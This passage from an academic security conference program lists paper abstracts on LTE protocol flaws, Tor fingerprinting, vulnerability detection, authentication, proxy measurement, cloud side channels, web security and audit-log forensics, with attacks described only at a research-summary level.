UTC, even a powerful man-in-the-middle attacker requires over 20 years of effort in expectation.

LTEInspector: A Systematic Approach for Adversarial Testing of 4G LTE

In this paper, we investigate the security and privacy of the three critical procedures of the 4G LTE protocol (i.e., attach, detach, and paging), and in the process, uncover potential design flaws of the protocol and unsafe practices employed by the stakeholders. For exposing vulnerabilities, we propose a modelbased testing approach LTEInspector which lazily combines a symbolic model checker and a cryptographic protocol verifier in the symbolic attacker model. Using LTEInspector, we have uncovered 10 new attacks along with 9 prior attacks, categorized into three abstract classes (i.e., security, user privacy, and disruption of service), in the three procedures of 4G LTE. Notable among our findings is the authentication relay attack that enables an adversary to spoof the location of a legitimate user to the core network without possessing appropriate credentials. To ensure that the exposed attacks pose real threats and are indeed realizable in practice, we have validated 8 of the 10 new attacks and their accompanying adversarial assumptions through experimentation in a real testbed.

GUTI Reallocation Demystified: Cellular Location Tracking with Changing Temporary Identifier

To keep subscribers’ identity confidential, a cellular network operator must use a temporary identifier instead of a permanent one according to the 3GPP standard. Temporary identifiers include Temporary Mobile Subscriber Identity (TMSI) and Globally Unique Temporary Identifier (GUTI) for GSM/3G and Long-Term Evolution (LTE) networks, respectively. Unfortunately, recent studies have shown that carriers fail to protect subscribers in both GSM/3G and LTE mainly because these identifiers have static and persistent values. These identifiers can be used to track subscribers’ locations. These studies have suggested that temporary identifiers must be reallocated frequently to solve this privacy problem. The only mechanism to update the temporary identifier in current LTE implementations is called GUTI reallocation. We investigate whether the current implementation of the GUTI reallocation mechanism can provide enough security to protect subscribers’ privacy. To do this, we collect data by performing GUTI reallocation more than 30,000 times with 28 carriers across 11 countries using 78 SIM cards. Then, we investigate whether (1) these reallocated GUTIs in each carrier show noticeable patterns and (2) if they do, these patterns are consistent among different SIM cards within each carrier. Among 28 carriers, 19 carriers have easily predictable and consistent patterns in their GUTI reallocation mechanisms. Among the remaining 9 carriers, we revisit 4 carriers to investigate them in greater detail. For all these 4 carriers, we could find interesting yet predictable patterns after invoking GUTI reallocation multiple times within a short time period. By using this predictability, we show that an adversary can track subscribers’ location as in previous studies. Finally, we present a lightweight and unpredictable GUTI reallocation mechanism as a solution.

Session 3A: Deep Learning and Adversarial ML

Automated Website Fingerprinting through Deep Learning

Several studies have shown that the network traffic that is generated by a visit to a website over Tor reveals information specific to the website through the timing and sizes of network packets. By capturing traffic traces between users and their Tor entry guard, a network eavesdropper can leverage this meta-data to reveal which website Tor users are visiting. The success of such attacks heavily depends on the particular set of traffic features that are used to construct the fingerprint. Typically, these features are manually engineered and, as such, any change introduced to the Tor network can render these carefully constructed features ineffective. In this paper, we show that an adversary can automate the feature engineering process, and thus automatically deanonymize Tor traffic by applying our novel method based on deep learning. We collect a dataset comprised of more than three million network traces, which is the largest dataset of web traffic ever used for website fingerprinting, and find that the performance achieved by our deep learning approaches is comparable to known methods which include various research efforts spanning over multiple years. The obtained success rate exceeds 96% for a closed world of 100 websites and 94% for our biggest closed world of 900 classes. In our open world evaluation, the most performant deep learning model is 2% more accurate than the state-ofthe-art attack. Furthermore, we show that the implicit features automatically learned by our approach are far more resilient to dynamic changes of web content over time. We conclude that the ability to automatically construct the most relevant traffic features and perform accurate traffic recognition makes our deep learning based approach an efficient, flexible and robust technique for website fingerprinting.

VulDeePecker: A Deep Learning-Based System for Vulnerability Detection

The automatic detection of software vulnerabilities is an important research problem. However, existing solutions to this problem rely on human experts to define features and often miss many vulnerabilities (i.e., incurring high false negative rate). In this paper, we initiate the study of using deep learning-based vulnerability detection to relieve human experts from the tedious and subjective task of manually defining features. Since deep learning is motivated to deal with problems that are very different from the problem of vulnerability detection, we need some guiding principles for applying deep learning to vulnerability detection. In particular, we need to find representations of software programs that are suitable for deep learning. For this purpose, we propose using code gadgets to represent programs and then transform them into vectors, where a code gadget is a number of (not necessarily consecutive) lines of code that are semantically related to each other. This leads to the design and implementation of a deep learning-based vulnerability detection system, called Vulnerability Deep Pecker (VulDeePecker). In order to evaluate VulDeePecker, we present the first vulnerability dataset for deep learning approaches. Experimental results show that VulDeePecker can achieve much fewer false negatives (with reasonable false positives) than other approaches. We further apply VulDeePecker to 3 software products (namely Xen, Seamonkey, and Libav) and detect 4 vulnerabilities, which are not reported in the National Vulnerability Database but were “silently” patched by the vendors when releasing later versions of these products; in contrast, these vulnerabilities are almost entirely missed by the other vulnerability detection systems we experimented with.

Kitsune: An Ensemble of Autoencoders for Online Network Intrusion Detection

Neural networks have become an increasingly popular solution for network intrusion detection systems (NIDS). Their capability of learning complex patterns and behaviors make them a suitable solution for differentiating between normal traffic and network attacks. However, a drawback of neural networks is the amount of resources needed to train them. Many network gateways and routers devices, which could potentially host an NIDS, simply do not have the memory or processing power to train and sometimes even execute such models. More importantly, the existing neural network solutions are trained in a supervised manner. Meaning that an expert must label the network traffic and update the model manually from time to time. In this paper, we present Kitsune: a plug and play NIDS which can learn to detect attacks on the local network, without supervision, and in an efficient online manner. Kitsune’s core algorithm (KitNET) uses an ensemble of neural networks called autoencoders to collectively differentiate between normal and abnormal traffic patterns. KitNET is supported by a feature extraction framework which efficiently tracks the patterns of every network channel. Our evaluations show that Kitsune can detect various attacks with a performance comparable to offline anomaly detectors, even on a Raspberry PI. This demonstrates that Kitsune can be a practical and economic NIDS.

Feature Squeezing: Detecting Adversarial Examples in Deep Neural Networks

Although deep neural networks (DNNs) have achieved great success in many tasks, they can often be fooled by adversarial examples that are generated by adding small but purposeful distortions to natural examples. Previous studies to defend against adversarial examples mostly focused on refining the DNN models, but have either shown limited success or required expensive computation. We propose a new strategy, feature squeezing, that can be used to harden DNN models by detecting adversarial examples. Feature squeezing reduces the search space available to an adversary by coalescing samples that correspond to many different feature vectors in the original space into a single sample. By comparing a DNN model’s prediction on the original input with that on squeezed inputs, feature squeezing detects adversarial examples with high accuracy and few false positives. This paper explores two feature squeezing methods: reducing the color bit depth of each pixel and spatial smoothing. These simple strategies are inexpensive and complementary to other defenses, and can be combined in a joint detection framework to achieve high detection rates against state-of-the-art attacks.

Trojaning Attack on Neural Networks

With the fast spread of machine learning techniques, sharing and adopting public machine learning models become very popular. This gives attackers many new opportunities. In this paper, we propose a trojaning attack on neural networks. As the models are not intuitive for human to understand, the attack features stealthiness. Deploying trojaned models can cause various severe consequences including endangering human lives (in applications like autonomous driving). We first inverse the neural network to generate a general trojan trigger, and then retrain the model with reversed engineered training data to inject malicious behaviors to the model. The malicious behaviors are only activated by inputs stamped with the trojan trigger. In our attack, we do not need to tamper with the original training process, which usually takes weeks to months. Instead, it takes minutes to hours to apply our attack. Also, we do not require the datasets that are used to train the model. In practice, the datasets are usually not shared due to privacy or copyright concerns. We use five different applications to demonstrate the power of our attack, and perform a deep analysis on the possible factors that affect the attack. The results show that our attack is highly effective and efficient. The trojaned behaviors can be successfully triggered (with nearly 100% possibility) without affecting its test accuracy for normal input and even with better accuracy on public dataset. Also, it only takes a small amount of time to attack a complex neuron network model. In the end, we also discuss possible defense against such attacks.

Session 3B: Authentication

Broken Fingers: On the Usage of the Fingerprint API in Android

Smartphones are increasingly used for very important tasks such as mobile payments. Correspondingly, new technologies are emerging to provide better security on smartphones. One of the most recent and most interesting is the ability to recognize fingerprints, which enables mobile apps to use biometric-based authentication and authorization to protect security-sensitive operations. In this paper, we present the first systematic analysis of the fingerprint API in Android, and we show that this API is not well understood and often misused by app developers. To make things worse, there is currently confusion about which threat model the fingerprint API should be resilient against. For example, although there is no official reference, we argue that the fingerprint API is designed to protect from attackers that can completely compromise the untrusted OS. After introducing several relevant threat models, we identify common API usage patterns and show how inappropriate choices can make apps vulnerable to multiple attacks. We then design and implement a new static analysis tool to automatically analyze the usage of the fingerprint API in Android apps. Using this tool, we perform the first systematic study on how the fingerprint API is used. The results are worrisome: Our tool indicates that 53.69% of the analyzed apps do not use any cryptographic check to ensure that the user actually touched the fingerprint sensor. Depending on the specific use case scenario of a given app, it is not always possible to make use of cryptographic checks. However, a manual investigation on a subset of these apps revealed that 80% of them could have done so, preventing multiple attacks. Furthermore, the tool indicates that only the 1.80% of the analyzed apps use this API in the most secure way possible, while many others, including extremely popular apps such as Google Play Store and Square Cash, use it in weaker ways. To make things worse, we find issues and inconsistencies even in the samples provided by the official Google documentation. We end this work by suggesting various improvements to the fingerprint API to prevent some of these problematic attacks.

K-means++ vs. Behavioral Biometrics: One Loop to Rule Them All

Behavioral biometrics, a field that studies patterns in an individual’s unique behavior, has been researched actively as a means of authentication for decades. Recently, it has even been adopted in many real world scenarios. In this paper, we study keystroke dynamics, the most researched of such behavioral biometrics, from the perspective of an adversary. We designed two adversarial agents with a standard accuracy convenience tradeoff: Targeted K-means++, which is an expensive, but extremely effective adversarial agent, and Indiscriminate K-means++, which is slightly less powerful, but adds no overhead cost to the attacker. With Targeted K-means++ we could compromise the security of 40-70% of users within ten tries. In contrast, with Indiscriminate K-means++, the security of 30-50% of users was compromised. Therefore, we conclude that while keystroke dynamics has potential, it is not ready for security critical applications yet. Future keystroke dynamics research should use such adversaries to benchmark the performance of the detection algorithms, and design better algorithms to foil these. Finally, we show that the K-means++ adversarial agent generalizes well to even other types of behavioral biometrics data by applying it on a dataset of touchscreen swipes.

ABC: Enabling Smartphone Authentication with Built-in Camera

Reliably identifying and authenticating smartphones is critical in our daily life since they are increasingly being used to manage sensitive data such as private messages and financial data. Recent researches on hardware fingerprinting show that each smartphone, regardless of the manufacturer or make, possesses a variety of hardware fingerprints that are unique, robust, and physically unclonable. There is a growing interest in designing and implementing hardware-rooted smartphone authentication which authenticates smartphones through verifying the hardware fingerprints of their built-in sensors. Unfortunately, previous fingerprinting methods either involve large registration overhead or suffer from fingerprint forgery attacks, rendering them infeasible in authentication systems. In this paper, we propose ABC, a real-time smartphone Authentication protocol utilizing the photo-response non-uniformity (PRNU) of the Built-in Camera. In contrast to previous works that require tens of images to build reliable PRNU features for conventional cameras, we are the first to observe that one image alone can uniquely identify a smartphone due to the unique PRNU of a smartphone image sensor. This new discovery makes the use of PRNU practical for smartphone authentication. While most existing hardware fingerprints are vulnerable against forgery attacks, ABC defeats forgery attacks by verifying a smartphone’s PRNU identity through a challenge response protocol using a visible light communication channel. A user captures two time-variant QR codes and sends the two images to a server, which verifies the identity by fingerprint and image content matching. The time-variant QR codes can also defeat replay attacks. Our experiments with 16,000 images over 40 smartphones show that ABC can efficiently authenticate user devices with an error rate less than 0.5%.

Device Pairing at the Touch of an Electrode

Device pairing is the problem of having two devices securely establish a key that can be used to secure subsequent communication. The problem arises every time two devices that do not already share a secret need to bootstrap a secure communication channel. Many solutions exist, all suited to different situations, and all with their own strengths and weaknesses. In this paper, we propose a novel approach to device pairing that applies whenever a user wants to pair two devises that can be physically touched at the same time. The pairing process is easy to perform, even for novice users. A central problem for a device (Alice) running a device pairing protocol, is determining whether the other party (Bob) is in fact the device that we are supposed to establish a key with. Our scheme is based on the idea that two devices can perform device pairing, if they are physically held by the same person (at the same time). In order to pair two devices, a person touches a conductive surface on each device. While the person is in contact with both devices, the human body acts as a transmission medium for intra-body communication and the two devices can communicate through the body. This body channel is used as part of a pairing protocol which allows the devices to agree on a mutual secret and, at the same time, extract physical features to verify that they are being held by the same person. We prove that our device pairing protocol is secure in our threat model and we build a proof of concept set-up and conduct experiments with 15 people to verify the idea in practice.

Face Flashing: a Secure Liveness Detection Protocol based on Light Reflections

Face authentication systems are becoming increasingly prevalent, especially with the rapid development of Deep Learning technologies. However, human facial information is easy to be captured and reproduced, which makes face authentication systems vulnerable to various attacks. Liveness detection is an important defense technique to prevent such attacks, but existing solutions did not provide clear and strong security guarantees, especially in terms of time. To overcome these limitations, we propose a new liveness detection protocol called Face Flashing that significantly increases the bar for launching successful attacks on face authentication systems. By randomly flashing well-designed pictures on a screen and analyzing the reflected light, our protocol has leveraged physical characteristics of human faces: reflection processing at the speed of light, unique textual features, and uneven 3D shapes. Cooperating with working mechanism of the screen and digital cameras, our protocol is able to detect subtle traces left by an attacking process. To demonstrate the effectiveness of Face Flashing, we implemented a prototype and performed thorough evaluations with large data set collected from real-world scenarios. The results show that our Timing Verification can effectively detect the time gap between legitimate authentications and malicious cases. Our Face Verification can also differentiate 2D plain from 3D objects accurately. The overall accuracy of our liveness detection system is 98.8%, and its robustness was evaluated in different scenarios. In the worst case, our system’s accuracy decreased to a still-high 97.3%.

Session 4A: Measurements

A Large-scale Analysis of Content Modification by Open HTTP Proxies

Open HTTP proxies offer a quick and convenient solution for routing web traffic towards a destination. In contrast to more elaborate relaying systems, such as anonymity networks or VPN services, users can freely connect to an open HTTP proxy without the need to install any special software. Therefore, open HTTP proxies are an attractive option for bypassing IPbased filters and geo-location restrictions, circumventing content blocking and censorship, and in general, hiding the client’s IP address when accessing a web server. Nevertheless, the consequences of routing traffic through an untrusted third party can be severe, while the operating incentives of the thousands of publicly available HTTP proxies are questionable. In this paper, we present the results of a large-scale analysis of open HTTP proxies, focusing on determining the extent to which user traffic is manipulated while being relayed. We have designed a methodology for detecting proxies that, instead of passively relaying traffic, actively modify the relayed content. Beyond simple detection, our framework is capable of macroscopically attributing certain traffic modifications at the network level to well-defined malicious actions, such as ad injection, user fingerprinting, and redirection to malware landing pages. We have applied our methodology on a large set of publicly available HTTP proxies, which we monitored for a period of two months, and identified that 38% of them perform some form of content modification. The majority of these proxies can be considered benign, as they do not perform any harmful content modification. However, 5.15% of the tested proxies were found to perform modification or injection that can be considered as malicious or unwanted. Specifically, 47% of the malicious proxies injected ads, 39% injected code for collecting user information that can be used for tracking and fingerprinting, and 12% attempted to redirect the user to pages that contain malware. Our study reveals the true incentives of many of the publicly available web proxies. Our findings raise several concerns, as we uncover multiple cases where users can be severely affected by connecting to an open proxy. As a step towards protecting users against unwanted content modification, we built a service that leverages our methodology to automatically collect and probe public proxies, and generates a list of safe proxies that do not perform any content modification, on a daily basis.

Measuring and Disrupting Anti-Adblockers Using Differential Execution Analysis

Millions of people use adblockers to remove intrusive and malicious ads as well as protect themselves against tracking and pervasive surveillance. Online publishers consider adblockers a major threat to the ad-powered “free” Web. They have started to retaliate against adblockers by employing antiadblockers which can detect and stop adblock users. To counter this retaliation, adblockers in turn try to detect and filter anti-adblocking scripts. This back and forth has prompted an escalating arms race between adblockers and anti-adblockers. We want to develop a comprehensive understanding of antiadblockers, with the ultimate aim of enabling adblockers to bypass state-of-the-art anti-adblockers. In this paper, we present a differential execution analysis to automatically detect and analyze anti-adblockers. At a high level, we collect execution traces by visiting a website with and without adblockers. Through differential execution analysis, we are able to pinpoint the conditions that lead to the differences caused by anti-adblocking code. Using our system, we detect anti-adblockers on 30.5% of the Alexa top10K websites which is 5-52 times more than reported in prior literature. Unlike prior work which is limited to detecting visible reactions (e.g., warning messages) by anti-adblockers, our system can discover attempts to detect adblockers even when there is no visible reaction. From manually checking one third of the detected websites, we find that the websites that have no visible reactions constitute over 90% of the cases, completely dominating the ones that have visible warning messages. Finally, based on our findings, we further develop JavaScript rewriting and API hooking based solutions (the latter implemented as a Chrome extension) to help adblockers bypass state-of-the-art anti-adblockers.

Towards Measuring the Effectiveness of Telephony Blacklists

The convergence of telephony with the Internet has led to numerous new attacks that make use of phone calls to defraud victims. In response to the increasing number of unwanted or fraudulent phone calls, a number of call blocking applications have appeared on smartphone app stores, including a recent update to the default Android phone app that alerts users of suspected spam calls. However, little is known about the methods used by these apps to identify malicious numbers, and how effective these methods are in practice. In this paper, we are the first to systematically investigate multiple data sources that may be leveraged to automatically learn phone blacklists, and to explore the potential effectiveness of such blacklists by measuring their ability to block future unwanted phone calls. Specifically, we consider four different data sources: user-reported call complaints submitted to the Federal Trade Commission (FTC), complaints collected via crowd-sourced efforts (e.g., 800notes.com), call detail records (CDR) from a large telephony honeypot [1], and honeypot-based phone call audio recordings. Overall, our results show that phone blacklists are capable of blocking a significant fraction of future unwanted calls (e.g., more than 55%). Also, they have a very low false positive rate of only 0.01% for phone numbers of legitimate businesses. We also propose an unsupervised learning method to identify prevalent spam campaigns from different data sources, and show how effective blacklists may be as a defense against such campaigns.

Things You May Not Know About Android (Un)Packers: A Systematic Study based on Whole-System Emulation

The prevalent usage of runtime packers has complicated Android malware analysis, as both legitimate and malicious apps are leveraging packing mechanisms to protect themselves against reverse engineer. Although recent efforts have been made to analyze particular packing techniques, little has been done to study the unique characteristics of Android packers. In this paper, we report the first systematic study on mainstream Android packers, in an attempt to understand their security implications. For this purpose, we developed DROIDUNPACK, a whole-system emulation based Android packing analysis framework, which compared with existing tools, relies on intrinsic characteristics of Android runtime (rather than heuristics), and further enables virtual machine inspection to precisely recover hidden code and reveal packing behaviors. Running our tool on 6 major commercial packers, 93,910 Android malware samples and 3 existing state-of-the-art unpackers, we found that not only are commercial packing services abused to encrypt malicious or plagiarized contents, they themselves also introduce securitycritical vulnerabilities to the apps being packed. Our study further reveals the prevalence and rapid evolution of custom packers used by malware authors, which cannot be defended against using existing techniques, due to their design weaknesses.

Session 6A: Cloud

Reduced Cooling Redundancy: A New Security Vulnerability in a Hot Data Center

Data centers have been growing rapidly in recent years to meet the surging demand of cloud services. However, the expanding scale and powerful servers generate a great amount of heat, resulting in significant cooling costs. A trend in modern data centers is to raise the temperature and maintain all servers in a relatively hot environment. While this can save on cooling costs given benign workloads running in servers, the hot environment increases the risk of cooling failure. In this paper, we unveil a new vulnerability of existing data centers with aggressive cooling energy saving policies. Such a vulnerability might be exploited to launch thermal attacks that could severely worsen the thermal conditions in a data center. Specifically, we conduct thermal measurements and uncover effective thermal attack vectors at the server, rack, and data center levels. We also present damage assessments of thermal attacks. Our results demonstrate that thermal attacks can (1) largely increase the temperature of victim servers degrading their performance and reliability, (2) negatively impact on thermal conditions of neighboring servers causing local hotspots, (3) raise the cooling cost, and (4) even lead to cooling failures. Finally, we propose effective defenses to prevent thermal attacks from becoming a serious security threat to data centers.

OBLIVIATE: A Data Oblivious Filesystem for Intel SGX

Intel SGX provides con dentiality and integrity of a program running within the con nes of an enclave, and is expected to enable valuable security applications such as private information retrieval. This paper is concerned with the security aspects of SGX in accessing a key system resource, les. Through concrete attack scenarios, we show that all existing SGX lesystems are vulnerable to either system call snooping, page fault, or cache based side-channel attacks. To address this security limitations in current SGX lesystems, we present OBLIVIATE, a data oblivious lesystem for Intel SGX. The key idea behind OBLIVIATE is in adapting the ORAM protocol to read and write data from a le within an SGX enclave. OBLIVIATE redesigns the conceptual components of ORAM for SGX environments, and it seamlessly supports an SGX program without requiring any changes in the application layer. OBLIVIATE also employs SGX-speci c defenses and optimizations in order to ensure complete security with acceptable overhead. The evaluation of the prototype of OBLIVIATE demonstrated its practical effectiveness in running popular server applications such as SQLite and Lighttpd, while also achieving a throughput improvement of 2×- 8× over a baseline ORAM-based solution, and less than 2× overhead over an in-memory SGX lesystem.

Microarchitectural Minefields: 4K-Aliasing Covert Channel and Multi-Tenant Detection in Iaas Clouds

We introduce a new microarchitectural timing covert channel using the processor memory order buffer (MOB). Specifically, we show how an adversary can infer the state of a spy process on the Intel 64 and IA-32 architectures when predicting dependent loads through the store buffer, called 4K-aliasing. The 4K-aliasing event is a side-effect of memory disambiguation misprediction while handling write-after-read data hazards wherein the lower 12-bits of a load address will falsely match with store addresses resident in the MOB. In this work, we extensively analyze 4K-aliasing and demonstrate a new timing channel measureable across processes when executed as hyperthreads. We then use 4K-aliasing to build a robust covert communication channel on both the Amazon EC2 and Google Compute Engine capable of communicating at speeds of 1.28 Mbps and 1.49 Mbps, respectively. In addition, we show that 4K-aliasing can also be used to reliably detect multi-tenancy.

Cloud Strife: Mitigating the Security Risks of Domain-Validated Certificates

Infrastructure-as-a-Service (IaaS), and more generally the “cloud,” like Amazon Web Services (AWS) or Microsoft Azure, have changed the landscape of system operations on the Internet. Their elasticity allows operators to rapidly allocate and use resources as needed, from virtual machines, to storage, to bandwidth, and even to IP addresses, which is what made them popular and spurred innovation. In this paper, we show that the dynamic component paired with recent developments in trust-based ecosystems (e.g., SSL certificates) creates so far unknown attack vectors. Specifically, we discover a substantial number of stale DNS records that point to available IP addresses in clouds, yet, are still actively attempted to be accessed. Often, these records belong to discontinued services that were previously hosted in the cloud. We demonstrate that it is practical, and time and cost efficient for attackers to allocate IP addresses to which stale DNS records point. Considering the ubiquity of domain validation in trust ecosystems, like SSL certificates, an attacker can impersonate the service using a valid certificate trusted by all major operating systems and browsers. The attacker can then also exploit residual trust in the domain name for phishing, receiving and sending emails, or possibly distribute code to clients that load remote code from the domain (e.g., loading of native code by mobile apps, or JavaScript libraries by websites). Even worse, an aggressive attacker could execute the attack in less than 70 seconds, well below common time-to-live (TTL) for DNS records. In turn, it means an attacker could exploit normal service migrations in the cloud to obtain a valid SSL certificate for domains owned and managed by others, and, worse, that she might not actually be bound by DNS records being (temporarily) stale, but that she can exploit caching instead. We introduce a new authentication method for trust-based domain validation that mitigates staleness issues without incurring additional certificate requester effort by incorporating existing trust of a name into the validation process. Furthermore, we provide recommendations for domain name owners and cloud operators to reduce their and their clients’ exposure to DNS staleness issues and the resulting domain takeover attacks.

Session 7A: Web Security

Game of Missuggestions: Semantic Analysis of Search-Autocomplete Manipulations

As a new type of blackhat Search Engine Optimization (SEO), autocomplete manipulations are increasingly utilized by miscreants and promotion companies alike to advertise desired suggestion terms when related trigger terms are entered by the user into a search engine. Like other illicit SEO, such activities game the search engine, mislead the querier, and in some cases, spread harmful content. However, little has been done to understand this new threat, in terms of its scope, impact and techniques, not to mention any serious effort to detect such manipulated terms on a large scale. Systematic analysis of autocomplete manipulation is challenging, due to the scale of the problem (tens or even hundreds of millions suggestion terms and their search results) and the heavy burdens it puts on the search engines. In this paper, we report the first technique that addresses these challenges, making a step toward better understanding and ultimately eliminating this new threat. Our technique, called Sacabuche, takes a semantics-based, two-step approach to minimize its performance impact: it utilizes Natural Language Processing (NLP) to analyze a large number of trigger and suggestion combinations, without querying search engines, to filter out the vast majority of legitimate suggestion terms; only a small set of suspicious suggestions are run against the search engines to get query results for identifying truly abused terms. This approach achieves a 96.23% precision and 95.63% recall, and its scalability enables us to perform a measurement study on 114 millions of suggestion terms, an unprecedented scale for this type of studies. The findings of the study bring to light the magnitude of the threat (0.48% Google suggestion terms we collected manipulated), and its significant security implications never reported before (e.g., exceedingly long lifetime of campaigns, sophisticated techniques and channels for spreading malware and phishing content).

SYNODE: Understanding and Automatically Preventing Injection Attacks on NODE.JS

The Node.js ecosystem has lead to the creation of many modern applications, such as serverside web applications and desktop applications. Unlike client-side JavaScript code, Node.js applications can interact freely with the operating system without the benefits of a security sandbox. As a result, command injection attacks can cause significant harm, which is compounded by the fact that independently developed Node.js modules interact in uncontrolled ways. This paper presents a large-scale study across 235,850 Node.js modules to explore injection vulnerabilities. We show that injection vulnerabilities are prevalent in practice, both due to eval, which was previously studied for browser code, and due to the powerful exec API introduced in Node.js. Our study suggests that thousands of modules may be vulnerable to command injection attacks and that fixing them takes a long time, even for popular projects. Motivated by these findings, we present Synode, an automatic mitigation technique that combines static analysis and runtime enforcement of security policies to use vulnerable modules in a safe way. The key idea is to statically compute a template of values passed to APIs that are prone to injections, and to synthesize a grammar-based runtime policy from these templates. Our mechanism is easy to deploy: it does not require any modification of the Node.js platform, it is fast (sub-millisecond runtime overhead), and it protects against attacks of vulnerable modules, while inducing very few false positives (less than 10%).

JavaScript Zero: Real JavaScript and Zero Side-Channel Attacks

Modern web browsers are ubiquitously used by billions of users, connecting them to the world wide web. From the other side, web browsers do not only provide a unified interface for businesses to reach customers, but they also provide a unified interface for malicious actors to reach users. The highly optimized scripting language JavaScript plays an important role in the modern web, as well as for browser-based attacks. These attacks include microarchitectural attacks, which exploit the design of the underlying hardware. In contrast to software bugs, there is often no easy fix for microarchitectural attacks. We propose JavaScript Zero, a highly practical and generic fine-grained permission model in JavaScript to reduce the attack surface in modern browsers. JavaScript Zero facilitates advanced features of the JavaScript language to dynamically deflect usage of dangerous JavaScript features. To implement JavaScript Zero in practice, we overcame a series of challenges to protect potentially dangerous features, guarantee the completeness of our solution, and provide full compatibility with all websites. We demonstrate that our proof-of-concept browser extension Chrome Zero protects against 11 unfixed state-of-the-art microarchitectural and sidechannel attacks. As a side effect, Chrome Zero also protects against 50% of the published JavaScript 0-day exploits since Chrome 49. Chrome Zero has a performance overhead of 1.82% on average. In a user study, we found that for 24 websites in the Alexa Top 25, users could not distinguish browsers with and without Chrome Zero correctly, showing that Chrome Zero has no perceivable effect on most websites. Hence, JavaScript Zero is a practical solution to mitigate JavaScript-based state-of-the-art microarchitectural and side-channel attacks.

Riding out DOMsday: Towards Detecting and Preventing DOM Cross-Site Scripting

Cross-site scripting (XSS) vulnerabilities are the most frequently reported web application vulnerability. As complex JavaScript applications become more widespread, DOM (Document Object Model) XSS vulnerabilities—a type of XSS vulnerability where the vulnerability is located in client-side JavaScript, rather than server-side code—are becoming more common. As the first contribution of this work, we empirically assess the impact of DOM XSS on the web using a browser with taint tracking embedded in the JavaScript engine. Building on the methodology used in a previous study that crawled popular websites, we collect a current dataset of potential DOM XSS vulnerabilities. We improve on the methodology for confirming XSS vulnerabilities, and using this improved methodology, we find 83% more vulnerabilities than previous methodology applied to the same dataset. As a second contribution, we identify the causes of and discuss how to prevent DOM XSS vulnerabilities. One example of our findings is that custom HTML templating designs—a design pattern that could prevent DOM XSS vulnerabilities analogous to parameterized SQL—can be buggy in practice, allowing DOM XSS attacks. As our third contribution, we evaluate the error rates of three static-analysis tools to detect DOM XSS vulnerabilities found with dynamic analysis techniques using in-the-wild examples. We find static-analysis tools to miss 90% of bugs found by our dynamic analysis, though some tools can have very few false positives and at the same time find vulnerabilities not found using the dynamic analysis.

Session 7B: Audit Logs

Towards Scalable Cluster Auditing through Grammatical Inference over Provenance Graphs

Investigating the nature of system intrusions in large distributed systems remains a notoriously difficult challenge. While monitoring tools (e.g., Firewalls, IDS) provide preliminary alerts through easy-to-use administrative interfaces, attack reconstruction still requires that administrators sift through gigabytes of system audit logs stored locally on hundreds of machines. At present, two fundamental obstacles prevent synergy between system-layer auditing and modern cluster monitoring tools: 1) the sheer volume of audit data generated in a data center is prohibitively costly to transmit to a central node, and 2) systemlayer auditing poses a “needle-in-a-haystack” problem, such that hundreds of employee hours may be required to diagnose a single intrusion. This paper presents Winnower, a scalable system for auditbased cluster monitoring that addresses these challenges. Our key insight is that, for tasks that are replicated across nodes in a distributed application, a model can be defined over audit logs to succinctly summarize the behavior of many nodes, thus eliminating the need to transmit redundant audit records to a central monitoring node. Specifically, Winnower parses audit records into provenance graphs that describe the actions of individual nodes, then performs grammatical inference over individual graphs using a novel adaptation of Deterministic Finite Automata (DFA) Learning to produce a behavioral model of many nodes at once. This provenance model can be efficiently transmitted to a central node and used to identify anomalous events in the cluster. We have implemented Winnower for Docker Swarm container clusters and evaluate our system against real-world applications and attacks. We show that Winnower dramatically reduces storage and network overhead associated with aggregating system audit logs, by as much as 98%, without sacrificing the important information needed for attack investigation. Winnower thus represents a significant step forward for security monitoring in distributed systems.

MCI : Modeling-based Causality Inference in Audit Logging for Attack Investigation

In this paper, we develop a model based causality inference technique for audit logging that does not require any application instrumentation or kernel modification. It leverages a recent dynamic analysis, dual execution (LDX), that can infer precise causality between system calls but unfortunately requires doubling the resource consumption such as CPU time and memory consumption. For each application, we use LDX to acquire precise causal models for a set of primitive operations. Each model is a sequence of system calls that have inter-dependences, some of them caused by memory operations and hence implicit at the system call level. These models are described by a language that supports various complexity such as regular, context-free, and even context-sensitive. In production run, a novel parser is deployed to parse audit logs (without any enhancement) to model instances and hence derive causality. Our evaluation on a set of real-world programs shows that the technique is highly effective. The generated models can recover causality with 0% false-positives (FP) and false-negatives (FN) for most programs and only 8.3% FP and 5.2% FN in the worst cases. The models also feature excellent composibility, meaning that the models derived from primitive operations can be composed together to describe causality for large and complex real world missions. Applying our technique to attack investigation shows that the system-wide attack causal graphs are highly precise and concise, having better quality than the state-of-the-art.

Towards a Timely Causality Analysis for Enterprise Security

The increasingly sophisticated Advanced Persistent Threat (APT) attacks have become a serious challenge for enterprise IT security. Attack causality analysis, which tracks multi-hop causal relationships between files and processes to diagnose attack provenances and consequences, is the first step towards understanding APT attacks and taking appropriate responses. Since attack causality analysis is a time-critical mission, it is essential to design causality tracking systems that extract useful attack information in a timely manner. However, prior work is limited in serving this need. Existing approaches have largely focused on pruning causal dependencies totally irrelevant to the attack, but fail to differentiate and prioritize abnormal events from numerous relevant, yet benign and complicated system operations, resulting in long investigation time and slow responses. To address this problem, we propose PRIOTRACKER, a backward and forward causality tracker that automatically prioritizes the investigation of abnormal causal dependencies in the tracking process. Specifically, to assess the priority of a system event, we consider its rareness and topological features in the causality graph. To distinguish unusual operations from normal system events, we quantify the rareness of each event by developing a reference model which records common routine activities in corporate computer systems. We implement PRIOTRACKER, in 20K lines of Java code, and a reference model builder in 10K lines of Java code. We evaluate our tool by deploying both systems in a real enterprise IT environment, where we collect 1TB of 2.5 billion OS events from 150 machines in one week. Experimental results show that PRIOTRACKER can capture attack traces that are missed by existing trackers and reduce the analysis time by up to two orders of magnitude.

JSgraph: Enabling Reconstruction of Web Attacks via Efficient Tracking of Live In-Browser JavaScript Executions

In this paper, we propose JSgraph, a forensic engine that is able to efficiently record fine-grained details pertaining to the execution of JavaScript (JS) programs within the browser, with particular focus on JS-driven DOM modifications. JSgraph’s main goal is to enable a detailed, post-mortem reconstruction of ephemeral JS-based web attacks experienced by real network users. In particular, we aim to enable the reconstruction of social engineering attacks that result in the download of malicious executable files or browser extensions, among other attacks. We implement JSgraph by instrumenting Chromium’s code base at the interface between Blink and V8, the rendering and JavaScript engines. We design JSgraph to be lightweight, highly portable, and to require low storage capacity for its fine-grained audit logs. Using a variety of both in-the-wild and lab-reproduced web attacks, we demonstrate how JSgraph can aid the forensic investigation process. We then show that JSgraph introduces acceptable overhead, with a median overhead on popular website page loads between 3.2% and 3.9%.

